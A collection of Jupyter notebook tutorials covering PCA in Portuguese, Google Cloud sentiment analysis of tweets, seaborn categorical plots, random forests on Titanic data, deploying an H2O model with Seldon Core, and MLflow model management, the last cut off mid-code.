São cada vez mais comuns a elevada quantidade de variáveis explicativas, porém quanto maior a quantidade de variáveis, mais difícil a interpretação da solução. A análise de componentes principais (Principal Component Analysis, PCA) é a técnica para reduzir a dimensionalidade desses conjuntos de dados, aumentando a interpretabilidade concomitante a minimização da perda de informações. Isso é feito criando novas variáveis não correlacionadas, preservando o máximo de variabilidade possível. Preservar o máximo de variabilidade possível, se traduz em encontrar novas variáveis que são funções lineares daquelas no conjunto de dados original.
Em regressão linear, geralmente determinamos a linha de melhor ajuste ao conjunto de dados, mas aqui no PCA, determinamos várias linhas ortogonais entre si no espaço n-dimensional, de melhor ajuste ao conjunto de dados. Ortogonal significa que essas linhas estão em ângulo reto entre si. O número de dimensões será o mesmo que o número de variáveis. Por exemplo, um conjunto de dados com 3 variáveis terá espaço tridimensional.
A análise de componentes principais é essencialmente apenas uma transformação de coordenadas. Considerando dados bidimencionais, por exemplo, os dados originais são plotados em um eixo X' e um eixo Y'. O método de PCA procura girar esses dois eixos para que o novo eixo X fique ao longo da direção da variação máxima nos dados. Como a técnica exige que os eixos sejam perpendiculares, em duas dimensões, a escolha de X' determinará Y'. Você obtém os dados transformados lendo os valores x e y deste novo conjunto de eixos, X 'e Y'. Para mais de duas dimensões, o primeiro eixo está na direção da maior variação; o segundo, na direção da segunda maior variação; e assim por diante.
<img src="https://miro.medium.com/max/2625/1*ba0XpZtJrgh7UpzWcIgZ1Q.jpeg" alt="" width="40%" style="display: block; margin: 20px auto;" />
## Procedimento para uma análise de componentes principais
Considere a matriz $X_{n \times p}$ composta por observações de $p$ características de $n$ indivíduos de uma população. As características observadas são representadas pelas variáveis $X_1, X_2, X_3, \cdots, X_p$.
$$
X = \left [ \begin{array}{ccccc}
x_{11} & x_{12} & x_{13} & \cdots & x_{1p}\\
x_{21} & x_{22} & x_{23} & \cdots & x_{2p}\\
\vdots & \vdots & \vdots & \cdots & \vdots \\
x_{n1} & x_{n2} & x_{n3} & \cdots & x_{np}\\
\end{array} \right ]
$$
### Passo 1
Para dados em que as variáveis $X_i$ estão em escalas diferentes (por exemplo $X_1$ representa o valor de um carro e $X_2$ o consumo de gasolina), é necessário padronizar os dados. Isso porque os componentes são influenciados pela escala das variáveis, justamente porque as matrizes de covariâncias, $\Sigma$ ou $\hat{\Sigma} = S$, são sensíveis à escala de um par de variáveis. Considere $\bar{x_j}$ a média da variável $X_j$; $s(X_j)$ o desvio padrão de $X_j$; sendo $i = 1, 2,3,4,\cdots, n$ e $j = 1, 2,3,4,\cdots, p$. Com isso, a padronização pode ser realizada por meio da equação abaixo:
- Média 0 e desvio padrão 1:
$$ x'_{ij}= \frac{x_{ij}-\bar{X_j}}{s(X_j)} $$
<br>
### Passo 2
Calcular a matriz de **covariância** ou **correlação**. Caso as variáveis estejam em escalas diferentes, é possível calcular a matriz de correlação nos dados originais. Esta possibilidade se deve ao fato de que a matriz de covariâncias das variáveis padronizadas é igual a matriz de correlação das variáveis originais.
$$
S = \left [ \begin{array}{ccccc}
\hat{Var}(x_1) & \hat{Cov}(x_1x_2) & \hat{Cov}(x_1x_3) & \cdots & \hat{Cov}(x_1x_p)\\
\hat{Cov}(x_2x_1) &\hat{Var}(x_2)& \hat{Cov}(x_2x_3) & \cdots & \hat{Cov}(x_2x_p)\\
\vdots & \vdots & \vdots & \cdots & \vdots \\
\hat{Cov}(x_px_1) & \hat{Cov}(x_px_2) & \hat{Cov}(x_px_3) & \cdots & \hat{Var}(x_p)\\
\end{array} \right ]
$$
<br>
<br>
$$
R = \left [ \begin{array}{ccccc}
1 & r(x_1x_2) & r(x_1x_3) & \cdots & r(x_1x_p)\\
r(x_2x_1) & 1 & r(x_2x_3) & \cdots & r(x_2x_p)\\
\vdots & \vdots & \vdots & \cdots & \vdots \\
r(x_px_1) & r(x_px_2) & r(x_px_3) & \cdots & 1\\
\end{array} \right ]
$$
Em que:
$$
\begin{array}{ccc}
\hat{Var}(x_j) = \frac{\sum_{i=1}^{n}(x_{ij}-\bar{x}_j}{n-1}, &
\hat{Cov}(x_{j1},x_{j2}) = \frac{\sum_{i=1}^n(x_{ij1}-\bar{x_{j1}})(x_{ij2}-\bar{x_{j2}})}{n-1}, &
r(x_{j1},x_{j2}) = \frac{\hat{Cov}(x_{j1},x_{j2})}{S_{xj1}S_{xj2}}
\end{array}
$$
<br>
### Passo 3
As componentes principais são determinadas através da equação característica da matriz S ou R:
$$det[R - \lambda I]= 0 $$
Em que $I$ é a matriz identidade de dimensão $p\times p$.
Se R ou S tem posto completo igual a $p$, então $det[R - \lambda I]= 0$, que pode ser reescrito como $\mid R - \lambda I \mid = 0$, terá $p$ soluções. Lembrando que ter posto completo significa que nenhuma coluna é combinação linear de outra.
Considere que $\lambda_1,\lambda_2,\lambda_3, \cdots, \lambda_p$ sejam as raízes da equação característica de R ou S, então temos que $\lambda_1 > \lambda_2 > \lambda_3 > \cdots, \lambda_p$. Chamamos $\lambda_i$ de autovalor. Além disso, para cada autovalor há um autovetor $\tilde{a}_i$ associado.
$$
\tilde{a}_i = \left [ \begin{array}{c}
a_{i1}\\
a_{i2}\\
\vdots \\
a_{ip} \\
\end{array} \right ]
$$
O cálculo do autovetor $\tilde{a}_i$, pode ser realizado considerando a seguinte propriedade:
$$ R\tilde{a}_i = \lambda_i \tilde{a}_i $$
Este resultado deve ser normalizado:
$$ a_i = \frac{\tilde{a}_i }{\mid \tilde{a}_i \mid}$$
desta forma a soma dos quadrados dos coeficientes é igual a 1 e são ortogonais entre si.
<br>
### Passo 4
O cálculo da i-ésima componente principal é dado por:
$$Z_i = a_{i1}X_1 + a_{i2}X_2 + a_{i3}X_3 + \cdots + a_{ip}X_p $$
em que $a_{i1}$ são as componetes do autovetor $a_i$ associado ao autovalor $\lambda_i$.
## Carregando o Dataset e Realizando uma Análise Exploratória dos Dados
---
```
# Bibliotecas
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.datasets import load_breast_cancer
# Carregando dataset do load_breast_cancer
data = load_breast_cancer()
type(data)
data['data']
pd.DataFrame(data['data'])
data.keys()
data['feature_names']
df = pd.DataFrame(data['data'], columns=data['feature_names'])
df.head()
data['target']
df.head()
df['target'] = data['target']
df.head()
```
### Passo 1: Padronização do nosso conjunto de dados
```
# Separando apenas as features para transformar (X)
X = df.drop('target', axis=1)
X.head()
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(X) # FIT é calcular a média e a variância de cada uma das variáveis.
scaler.mean_
scaler.var_
X_scaled = scaler.transform(X)
X_scaled # Transformou em média ZERO e desvio padrão UM
pd.DataFrame(X_scaled).describe()
```
### Resumindo a utilização do StandardScaler...
```
# OUTRO MÉTODO - MAIS RÁPIDO!!
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
X_scaled
```
### Passo 2: Calcular a matriz de covariância [...]
### Utilizando a biblioteca do Sklearn
1. Padronizar as *features*
2. Aplicar o PCA
#### Aplicando o PCA
https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html
```
from sklearn.decomposition import PCA
pca = PCA()
pca.fit(X_scaled) # Esse FIT vai calcular os novos eixos
```
#### Obtendo a matriz de dados transformada
```
X_pca = pca.transform(X_scaled) # Vai padronizar
X_pca # As features convertidas em novos eixos com outros valores
X.head() # Features originais
X_pca = pd.DataFrame(X_pca, columns=[f'C{i}' for i in range(1, X.shape[1] + 1)])
X_pca
```
#### Analisando a variância explicada
```
pca.explained_variance_
pca.explained_variance_ratio_ # Variância em percentuais
pca.explained_variance_ratio_.cumsum() # Soma acumulada
plt.figure(figsize=(20, 8))
plt.plot(X_pca.columns, pca.explained_variance_ratio_.cumsum())
plt.bar(X_pca.columns, pca.explained_variance_ratio_)
```
#### Realizando a transformada inversa
```
pd.DataFrame(X_scaled)
X_inverted = pca.inverse_transform(X_pca)
pd.DataFrame(X_inverted)
X_original = scaler.inverse_transform(X_inverted)
pd.DataFrame(X_original)
X.head()
```
### Aplicando o PCA com otimização de variáveis
```
pca = PCA(n_components=0.95) # Corte as minhas variáveis para obter 95% das informações das originais
X_pca_optimized = pca.fit_transform(X_scaled)
X_pca_optimized.shape
X_pca_optimized.shape
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/Estampille/Cognitive-Services-Vision-Solution-Templates/blob/master/googlesentiments.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
!pip install --upgrade google-api-python-client
!pip install google-cloud-language
!pip3 install --upgrade google-cloud-storage
!pip install --upgrade pip
!pip install word2number
!pip install contractions
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from google.colab import auth
from oauth2client.client import GoogleCredentials
import argparse
from google.cloud import language_v1
```
attribution sheet
```
from google.colab import auth
auth.authenticate_user()
import gspread
from oauth2client.client import GoogleCredentials
gc = gspread.authorize(GoogleCredentials.get_application_default())
sh = gc.open('COUNTERPOINT_extrait_tweet')
shfr = sh.worksheet('climate fr')
```
pre-processing data
```
from bs4 import BeautifulSoup
import spacy
import re
from word2number import w2n
import contractions
shfr_html=[]
for i in range(20):
text = text = "{}".format([shfr.cell(i+2, 4).value])
def strip_html_tags(text):
"""remove html tags from text"""
linkr = re.sub(r"http\S+", "", text)
hashr=re.sub(r"#","",linkr)
result=hashr.replace("\\n", " ").replace("\\","").replace("-", " ").replace("@", "").replace("\"","").replace("é","e").replace("è","e").replace("'", " ").replace("’", " ")
soup = BeautifulSoup(result, "html.parser")
stripped_text = soup.get_text(separator=" ")
return stripped_text
shfr_html.append("{}".format(strip_html_tags(text)))
print(shfr_html[7])
```
sentiment analyze
```
from google.cloud import language
from google.cloud.language import enums
from google.cloud.language import types
from google.oauth2 import service_account
credentials = service_account.Credentials.from_service_account_file('apikey.json')
client = language.LanguageServiceClient(credentials=credentials)
for i in range (10):
def tweet(client):
results=[]
text = "{}".format(shfr_html[i])
#Setting the Service Account key
document = types.Document(
content=text,
type=enums.Document.Type.PLAIN_TEXT)
sentiment = client.analyze_sentiment(document=document).document_sentiment
if sentiment.score <0 :
results.append("négatif")
elif sentiment.score >0:
results.append("positif")
else:
results.append("mixe ou incertain")
results.append('Text: {} '.format(text))
results.append(' Sentiment: {}, Magnitude{}'.format(sentiment.score, sentiment.magnitude))
print(result)
print(sentiment)
print (client.analyze_sentiment(document=document))
return results
result= tweet(client)
shfr.update_cell( i+2,11, ' '.join(result))
print(results)
```
|
github_jupyter
|
# Plotting Categorical Data
In this section, we will:
- Plot distributions of data across categorical variables
- Plot aggregate/summary statistics across categorical variables
## Plotting Distributions Across Categories
We have seen how to plot distributions of data. Often, the distributions reveal new information when you plot them across categorical variables.
Let's see some examples.
```
# loading libraries and reading the data
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# set seaborn theme if you prefer
sns.set(style="white")
# read data
market_df = pd.read_csv("./global_sales_data/market_fact.csv")
customer_df = pd.read_csv("./global_sales_data/cust_dimen.csv")
product_df = pd.read_csv("./global_sales_data/prod_dimen.csv")
shipping_df = pd.read_csv("./global_sales_data/shipping_dimen.csv")
orders_df = pd.read_csv("./global_sales_data/orders_dimen.csv")
```
### Boxplots
We had created simple boxplots such as the ones shown below. Now, let's plot multiple boxplots and see what they can tell us the distribution of variables across categories.
```
# boxplot of a variable
sns.boxplot(y=market_df['Sales'])
plt.yscale('log')
plt.show()
```
Now, let's say you want to **compare the (distribution of) sales of various product categories**. Let's first merge the product data into the main dataframe.
```
# merge the dataframe to add a categorical variable
df = pd.merge(market_df, product_df, how='inner', on='Prod_id')
df.head()
# boxplot of a variable across various product categories
sns.boxplot(x='Product_Category', y='Sales', data=df)
plt.yscale('log')
plt.show()
```
So this tells you that the sales of office supplies are, on an average, lower than the other two categories. The sales of technology and furniture categories seem much better. Note that each order can have multiple units of products sold, so Sales being higher/lower may be due to price per unit or the number of units.
Let's now plot the other important variable - Profit.
```
# boxplot of a variable across various product categories
sns.boxplot(x='Product_Category', y='Profit', data=df)
plt.show()
```
Profit clearly has some *outliers* due to which the boxplots are unreadable. Let's remove some extreme values from Profit (for the purpose of visualisation) and try plotting.
```
df = df[(df.Profit<1000) & (df.Profit>-1000)]
# boxplot of a variable across various product categories
sns.boxplot(x='Product_Category', y='Profit', data=df)
plt.show()
```
You can see that though the category 'Technology' has better sales numbers than others, it is also the one where the **most loss making transactions** happen. You can drill further down into this.
```
# adjust figure size
plt.figure(figsize=(10, 8))
# subplot 1: Sales
plt.subplot(1, 2, 1)
sns.boxplot(x='Product_Category', y='Sales', data=df)
plt.title("Sales")
plt.yscale('log')
# subplot 2: Profit
plt.subplot(1, 2, 2)
sns.boxplot(x='Product_Category', y='Profit', data=df)
plt.title("Profit")
plt.show()
```
Now that we've compared Sales and Profits across product categories, let's drill down further and do the same across **another categorical variable** - Customer_Segment.
We'll need to add the customer-related attributes (dimensions) to this dataframe.
```
# merging with customers df
df = pd.merge(df, customer_df, how='inner', on='Cust_id')
df.head()
# boxplot of a variable across various product categories
sns.boxplot(x='Customer_Segment', y='Profit', data=df)
plt.show()
```
You can **visualise the distribution across two categorical variables** using the ```hue= ``` argument.
```
# set figure size for larger figure
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
# specify hue="categorical_variable"
sns.boxplot(x='Customer_Segment', y='Profit', hue="Product_Category", data=df)
plt.show()
```
Across all customer segments, the product category ```Technology``` seems to be doing fairly well, though ```Furniture``` is incurring losses across all segments.
Now say you are curious to know why certain orders are making huge losses. One of your hypothesis is that the *shipping cost is too high in some orders*. You can **plot derived variables** as well, such as *shipping cost as percentage of sales amount*.
```
# plot shipping cost as percentage of Sales amount
sns.boxplot(x=df['Product_Category'], y=100*df['Shipping_Cost']/df['Sales'])
plt.ylabel("100*(Shipping cost/Sales)")
plt.show()
```
## Plotting Aggregated Values across Categories
### Bar Plots - Mean, Median and Count Plots
Bar plots are used to **display aggregated values** of a variable, rather than entire distributions. This is especially useful when you have a lot of data which is difficult to visualise in a single figure.
For example, say you want to visualise and *compare the average Sales across Product Categories*. The ```sns.barplot()``` function can be used to do that.
```
# bar plot with default statistic=mean
sns.barplot(x='Product_Category', y='Sales', data=df)
plt.show()
```
Note that, **by default, seaborn plots the mean value across categories**, though you can plot the count, median, sum etc. Also, barplot computes and shows the confidence interval of the mean as well.
```
# Create 2 subplots for mean and median respectively
# increase figure size
plt.figure(figsize=(12, 6))
# subplot 1: statistic=mean
plt.subplot(1, 2, 1)
sns.barplot(x='Product_Category', y='Sales', data=df)
plt.title("Average Sales")
# subplot 2: statistic=median
plt.subplot(1, 2, 2)
sns.barplot(x='Product_Category', y='Sales', data=df, estimator=np.median)
plt.title("Median Sales")
plt.show()
```
Look at that! The mean and median sales across the product categories tell different stories. This is because of some outliers (extreme values) in the ```Furniture``` category, distorting the value of the mean.
You can add another categorical variable in the plot.
```
# set figure size for larger figure
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
# specify hue="categorical_variable"
sns.barplot(x='Customer_Segment', y='Profit', hue="Product_Category", data=df, estimator=np.median)
plt.show()
```
The plot neatly shows the median profit across product categories and customer segments. It says that:
- On an average, only Technology products in Small Business and Corporate (customer) categories are profitable.
- Furniture is incurring losses across all Customer Segments
Compare this to the boxplot we had created above - though the bar plots contains 'lesser information' than the boxplot, it is more revealing.
<hr>
When you want to visualise having a large number of categories, it is helpful to plot the categories across the y-axis. Let's now *drill down into product sub categories*.
```
# Plotting categorical variable across the y-axis
plt.figure(figsize=(10, 8))
sns.barplot(x='Profit', y="Product_Sub_Category", data=df, estimator=np.median)
plt.show()
```
The plot clearly shows which sub categories are incurring the heaviest losses - Copiers and Fax, Tables, Chairs and Chairmats are the most loss making categories.
You can also plot the **count of the observations** across categorical variables using ```sns.countplot()```.
```
# Plotting count across a categorical variable
plt.figure(figsize=(10, 8))
sns.countplot(y="Product_Sub_Category", data=df)
plt.show()
```
Note the most loss making category - Copiers and Fax - has a very few number of orders.
In the next section, we will see how to plot Time Series data.
## Additional Stuff on Plotting Categorical Variables
1. <a href="https://seaborn.pydata.org/tutorial/categorical.html">Seaborn official tutorial on categorical variables</a>
|
github_jupyter
|
<img src="https://maltem.com/wp-content/uploads/2020/04/LOGO_MALTEM.png" style="float: left; margin: 20px; height: 55px">
<br>
<br>
<br>
<br>
# Random Forests and ExtraTrees
_Authors: Matt Brems (DC), Riley Dallas (AUS)_
---
## Random Forests
---
With bagged decision trees, we generate many different trees on pretty similar data. These trees are **strongly correlated** with one another. Because these trees are correlated with one another, they will have high variance. Looking at the variance of the average of two random variables $T_1$ and $T_2$:
$$
\begin{eqnarray*}
Var\left(\frac{T_1+T_2}{2}\right) &=& \frac{1}{4}\left[Var(T_1) + Var(T_2) + 2Cov(T_1,T_2)\right]
\end{eqnarray*}
$$
If $T_1$ and $T_2$ are highly correlated, then the variance will about as high as we'd see with individual decision trees. By "de-correlating" our trees from one another, we can drastically reduce the variance of our model.
That's the difference between bagged decision trees and random forests! We're going to do the same thing as before, but we're going to de-correlate our trees. This will reduce our variance (at the expense of a small increase in bias) and thus should greatly improve the overall performance of the final model.
So how do we "de-correlate" our trees?
Random forests differ from bagging decision trees in only one way: they use a modified tree learning algorithm that selects, at each split in the learning process, a **random subset of the features**. This process is sometimes called the *random subspace method*.
The reason for doing this is the correlation of the trees in an ordinary bootstrap sample: if one or a few features are very strong predictors for the response variable (target output), these features will be used in many/all of the bagged decision trees, causing them to become correlated. By selecting a random subset of features at each split, we counter this correlation between base trees, strengthening the overall model.
For a problem with $p$ features, it is typical to use:
- $\sqrt{p}$ (rounded down) features in each split for a classification problem.
- $p/3$ (rounded down) with a minimum node size of 5 as the default for a regression problem.
While this is a guideline, Hastie and Tibshirani (authors of Introduction to Statistical Learning and Elements of Statistical Learning) have suggested this as a good rule in the absence of some rationale to do something different.
Random forests, a step beyond bagged decision trees, are **very widely used** classifiers and regressors. They are relatively simple to use because they require very few parameters to set and they perform pretty well.
- It is quite common for interviewers to ask how a random forest is constructed or how it is superior to a single decision tree.
---
## Extremely Randomized Trees (ExtraTrees)
Adding another step of randomization (and thus de-correlation) yields extremely randomized trees, or _ExtraTrees_. Like Random Forests, these are trained using the random subspace method (sampling of features). However, they are trained on the entire dataset instead of bootstrapped samples. A layer of randomness is introduced in the way the nodes are split. Instead of computing the locally optimal feature/split combination (based on, e.g., information gain or the Gini impurity) for each feature under consideration, a random value is selected for the split. This value is selected from the feature's empirical range.
This further reduces the variance, but causes an increase in bias. If you're considering using ExtraTrees, you might consider this to be a hyperparameter you can tune. Build an ExtraTrees model and a Random Forest model, then compare their performance!
That's exactly what we'll do below.
## Import libraries
---
We'll need the following libraries for today's lecture:
- `pandas`
- `numpy`
- `GridSearchCV`, `train_test_split` and `cross_val_score` from `sklearn`'s `model_selection` module
- `RandomForestClassifier` and `ExtraTreesClassifier` from `sklearn`'s `ensemble` module
```
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import cross_val_score, train_test_split, GridSearchCV
```
## Load Data
---
Load `train.csv` and `test.csv` from Kaggle into `DataFrames`.
```
train = pd.read_csv('../datasets/train.csv')
test = pd.read_csv('../datasets/test.csv')
train.head()
train.shape
```
## Data Cleaning: Drop the two rows with missing `Embarked` values from train
---
```
train = train[train['Embarked'].notnull()]
train.shape
train[train['Pclass'] == 3]
```
## Data Cleaning: `Fare`
---
The test set has one row with a missing value for `Fare`. Fill it with the average `Fare` with everyone from the same `Pclass`. **Use the training set to calculate the average!**
```
mean_fare_3 = train[train['Pclass'] == 3]['Fare'].mean()
mean_fare_3
test['Fare'] = test['Fare'].fillna(mean_fare_3)
test.isnull().sum()
```
## Data Cleaning: `Age`
---
Let's simply impute all missing ages to be **999**.
**NOTE**: This is not a best practice. However,
1. Since we haven't really covered imputation in depth
2. And the proper way would take too long to implement (thus detracting) from today's lecture
3. And since we're ensembling with Decision Trees
We'll do it this way as a matter of convenience.
```
train['Age'] = train['Age'].fillna(999)
test['Age'] = test['Age'].fillna(999)
```
## Feature Engineering: `Cabin`
---
Since there are so many missing values for `Cabin`, let's binarize that column as follows:
- 1 if there originally was a value for `Cabin`
- 0 if it was null
**Do this for both `train` and `test`**
```
train['Cabin'] = train['Cabin'].notnull().astype(int)
test['Cabin'] = test['Cabin'].notnull().astype(int)
```
## Feature Engineering: Dummies
---
Dummy the `Sex` and `Embarked` columns. Be sure to set `drop_first=True`.
```
train = pd.get_dummies(train, columns=['Sex', 'Embarked'], drop_first=True)
test = pd.get_dummies(test, columns=['Sex', 'Embarked'], drop_first=True)
```
## Model Prep: Create `X` and `y` variables
---
Our features will be:
- `Pclass`
- `Age`
- `SibSp`
- `Parch`
- `Fare`
- `Cabin`
- `Sex_male`
- `Embarked_Q`
- `Embarked_S`
And our target will be `Survived`
```
features = ['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Sex_male', 'Embarked_Q', 'Embarked_S']
X = train[features]
y = train['Survived']
```
## Challenge: What is our baseline accuracy?
---
The baseline accuracy is the percentage of the majority class, regardless of whether it is 1 or 0. It serves as the benchmark for our model to beat.
```
y.value_counts(normalize=True)
```
## Train/Test Split
---
I know it can be confusing having an `X_test` from our training data vs a test set from Kaggle. If you want, you can use `X_val`/`y_val` for what we normally call `X_test`/`y_test`.
```
X_train, X_val, y_train, y_val = train_test_split(X, y, random_state=42, stratify=y)
```
## Model instantiation
---
Create an instance of `RandomForestClassifier` and `ExtraTreesClassifier`.
```
rf = RandomForestClassifier(n_estimators=100)
et = ExtraTreesClassifier(n_estimators=100)
```
## Model Evaluation
---
Which one has a higher `cross_val_score`?
```
cross_val_score(rf, X_train, y_train, cv=5).mean()
cross_val_score(et, X_train, y_train, cv=5).mean()
```
## Grid Search
---
They're both pretty close performance-wise. We could Grid Search over both, but for the sake of time we'll go with `RandomForestClassifier`.
```
rf_params = {
'n_estimators': [100, 150, 200],
'max_depth': [None, 1, 2, 3, 4, 5],
}
gs = GridSearchCV(rf, param_grid=rf_params, cv=5)
gs.fit(X_train, y_train)
print(gs.best_score_)
gs.best_params_
gs.score(X_train, y_train)
gs.score(X_val, y_val)
```
## Kaggle Submission
---
Now that we've evaluated our model, let's submit our predictions to Kaggle.
```
pred = gs.predict(test[features])
test['Survived'] = pred
test[['PassengerId', 'Survived']].to_csv('submission.csv')
```
|
github_jupyter
|
# H2O Model
* Wrap a H2O model for use as a prediction microservice in seldon-core
* Run locally on Docker to test
* Deploy on seldon-core running on minikube
## Dependencies
* [Helm](https://github.com/kubernetes/helm)
* [Minikube](https://github.com/kubernetes/minikube)
* [S2I](https://github.com/openshift/source-to-image)
* [H2O](https://www.h2o.ai/download/)
```bash
pip install seldon-core
pip install sklearn
```
## Train locally
```
!mkdir -p experiment
import h2o
h2o.init()
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
path = "http://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv.zip"
h2o_df = h2o.import_file(path)
h2o_df['CAPSULE'] = h2o_df['CAPSULE'].asfactor()
model = H2OGeneralizedLinearEstimator(family = "binomial")
model.train(y = "CAPSULE",
x = ["AGE", "RACE", "PSA", "GLEASON"],
training_frame = h2o_df)
modelfile = model.download_mojo(path="./experiment/", get_genmodel_jar=False)
print("Model saved to " + modelfile)
!mv experiment/*.zip src/main/resources/model.zip
```
Wrap model using s2i
```
!s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1
!docker run --name "h2o_predictor" -d --rm -p 5000:5000 h2o-test:0.1
```
Send some random features that conform to the contract
```
!seldon-core-tester contract.json 0.0.0.0 5000 -p
!docker rm h2o_predictor --force
```
## Test using Minikube
**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**
```
!minikube start --memory 4096
```
## Setup Seldon Core
Use the notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).
## Build model image and run predictions
```
!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1
!kubectl create -f h2o_deployment.json
```
Wait until ready (replicas == replicasAvailable)
```
!kubectl rollout status deployment/h2o-deployment-h2o-predictor-1cc70ed
!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \
seldon-deployment-example --namespace seldon -p
!minikube delete
```
|
github_jupyter
|
# Model management with MLflow
Model management can be done using both MLflow and Azure ML SDK/CLI v2. If you are familiar with MLflow and the capabilities it exposes, we support the entire model lifecycle using the MLFlow client. If you rather use Azure ML specific features or do model management using the CLI, in the same way you can manage the lifecycle using the Azure ML CLI/SDK v2.
## Support matrix for managing models
The MLflow client exposes several methods to retrieve and manage models. The following table shows which of those methods are currently supported in MLflow when connected to Azure ML:
| Feature | MLflow | Azure ML with MLflow | Azure ML CLIv2 |
| :- | :-: | :-: | :-: |
| Registering models in MLModel models | ☑️ | ☑️ | ☑️ |
| Registering models not in MLModel format | ☐ | ☐ | ☑️ |
| Registering models from runs with URIs as `runs/:<ruin-id>/<path>` | ☑️ | ☑️ | ☐ |
| Registering models from runs with URIs as `azureml://jobs/<job-id>/outputs/artifacts/<path>` | ☐ | ☐ | ☑️* |
| Listing registered models | ☑️ | ☑️ | ☑️ |
| Retrieving details of registered model's versions | ☑️ | ☑️ | ☑️ |
| Editing registered model's versions description | ☑️ | ☑️ | ☑️ |
| Editing registered model's versions tags | ☑️ | ☑️ | ☑️ |
| Renaming registered models | ☑️ | ☐** | ☐** |
| Deleting a registered model (container) | ☑️ | ☐** | ☐** |
| Deleting a registered model's version | ☑️ | ☑️ | ☑️ |
| Search registered models by name | ☑️ | ☑️ | ☑️ |
| Search registered models using string comparators `LIKE` and `ILIKE` | ☑️ | ☐ | ☐ |
| Search registered models by tag | ☐ | ☐ | ☐ |
Notes:
* (*) With compatibility issues with Mlflow client
* (**) Registered models are immutable objects in Azure ML
## Prerequisites to run this notebook
```
# Ensure you have the dependencies for this notebook
%pip install -r logging_model_with_mlflow.txt
import mlflow
```
In the following notebook, we will explore an example that uses the following naming convention:
```
experiment_name = "heart-classifier"
model_name = "heart-classifier"
artifact_path = "classifier"
```
We need to create a couple of runs and experiments in the workspace to work with. Please run at least one or two training routines:
```
# Install the AML extension and log into Azure
!az extension add -n ml
!az login
# Configure workspace and resource group
!az config set defaults.workspace=MyWorkspace defaults.group=MyResourceGroup
# Ensure there is a compute to train on
!az ml compute create -f ../jobs/trainer-cpu.compute.yml
# Submit a couple of training jobs to have something to work with
!az ml job create -f ../jobs/heart-classifier.job.yml
```
## Before starting
If you are running inside of a Compute Instance in Azure ML, MLflow is already configured to be used. If you are running in you local machine or in a different platform, please configure MLflow to point to the workspace you want to work with by uncommenting the following line and placing your workspace tracking URL.
```
# mlflow.set_tracking_uri = "<TRACKING_URI>"
```
> To get the URI, please navigate to Azure ML Studio and select the workspace you are working on > Click on the name of the workspace at the upper right corner of the page > Click “View all properties in Azure Portal” on the pane popup > Copy the MLflow tracking URI value from the properties section.
## Creating models from an existing run
If you have an Mlflow model logged inside of a run and you want to register it in a registry, you can do that by using the experiment and run ID information from the run:
```
exp = mlflow.get_experiment_by_name(experiment_name)
last_run = mlflow.search_runs(exp.experiment_id, output_format="list")[-1]
print(last_run.info.run_id)
```
Once we have the run identified, we can register the model using Mlflow client:
```
mlflow.register_model(f"runs:/{last_run.info.run_id}/{artifact_path}", model_name)
```
## Creating models from assets
If you have a folder with an MLModel MLflow model, then you can register it directly. There is no need for the model to be always in the context of a run. To do that you can use the URI schema `file://path/to/model` to register it. Let's create a simple model and save it in MLModel format:
```
from sklearn import linear_model
reg = linear_model.LinearRegression()
reg.fit([[0, 0], [1, 1], [2, 2]], [0, 1, 2])
mlflow.sklearn.save_model(reg, "./regressor")
```
Check the files in the folder
```
!ls regressor
```
You can now register the model from the local path:
```
import os
model_local_path = os.path.abspath("./regressor")
mlflow.register_model(f"file://{model_local_path}", "local-model-test")
```
> Notice how the model URI schema `file:/` requires absolute paths.
## Querying models
### Querying all the models in the registry
You can query all the registered models in the registry using the MLflow client with the method `list_registered_models`.
```
client = mlflow.tracking.MlflowClient()
for model in client.list_registered_models():
print(f"{model.name}")
```
If you are not sure of the name of the model you are looking for, you can search for it:
```
client.search_registered_models(f"name='{model_name}'")
```
### Getting specific versions of the model
The command above will retrieve the model object which contains all the model versions. However, if you want to get the last registered model version of a given model, you can use `get_registered_model`:
```
client.get_registered_model(model_name)
```
If you need an specific version of the model, you can indicate so:
```
client.get_model_version(model_name, version=2)
```
## Model stages
MLflow supports model's stages to manage model's lifecycle. Stage are assigned to model's version (instead of models). This means that a given model can have multiple versions on different stages.
### Queying model stages
You can use the MLflow client to check all the possible stages a model can be:
```
client.get_model_version_stages(model_name, version="latest")
```
You can see what model version is on each stage by getting the model from the registry:
```
client.get_latest_versions(model_name, stages=["Staging"])
```
Notice that multiple versions can be in the same stage at the same time in Mlflow, however, this method returns the latest version (greater version) among all of them.
> Caution: Notice that stages are case sensitive.
### Transitioning models
To transition a model to a particular stage, you can:
```
client.transition_model_version_stage(model_name, version=3, stage="Staging")
```
By default, if there were an existing model version in that particular stage, it will remain there. Hence, it won't be replaced. Alternatively, you can indicate `archive_existing_versions=True` to tell MLflow to move the existing model's version to the stage `Archived`.
```
client.transition_model_version_stage(
